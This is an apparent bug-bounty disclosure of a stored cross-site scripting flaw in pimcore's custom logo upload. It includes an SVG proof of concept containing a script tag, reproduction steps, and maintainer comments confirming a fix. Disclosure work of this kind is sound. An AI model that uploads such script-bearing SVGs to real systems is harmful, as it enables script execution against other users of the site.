Unrestricted Upload of File with Dangerous Type in pimcore/pimcore

Valid

Reported on

Jan 17th 2022


Description

The pimcore/pimcore package is an open source platform that provides PIM, MDM, CDP, DAM, DXP/CMS and digital commerce services. You can upload an infinite number of dangerous SVG files in "Settings" => "System Settings" => "Appearance and Branding" of the pimcore service. Then why is it dangerous? This is because when reading the upload file, it is read as raw data.

Proof of Concept

<?xml version="1.0" standalone="no"?>
<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">
<svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg">
   <rect width="300" height="100" style="fill:rgb(0,0,255);stroke-width:3;stroke:rgb(0,0,0)" />
   <script>alert(document.domain)</script>
</svg>
1. Open the https://10.x-dev.pimcore.fun/admin/login?perspective=
2. After login, Go to "Settings" => "System Setting" => "Appearance & Branding"
3. Upload a SVG fille using the Custom Logo Logic
4. Open the url of svg file

Video : https://www.youtube.com/watch?v=BwuR0aHCMFY

Impact

Through this vulnerability, an attacker is capable to execute malicious scripts.

Occurrences

I am sorry. I couldn't find a code..

We are processing your report and will contact the pimcore team within 24 hours. 4 months ago
Pocas modified the report
4 months ago
Bernhard Rusch validated this vulnerability 4 months ago
Pocas has been awarded the disclosure bounty
The fix bounty is now up for grabs
Bernhard Rusch
4 months ago

Maintainer


A very uncertain case ... as this functionality is anyway just set by an administrator and you have to call the image URL explicitly.

Anyway, I've provided a fix.

Pocas
4 months ago

Researcher


I agree on that part. thank you.

Bernhard Rusch confirmed that a fix has been merged on 35d185 4 months ago
Bernhard Rusch has been awarded the fix bounty
Dao.php#L2 has been validated
to join this conversation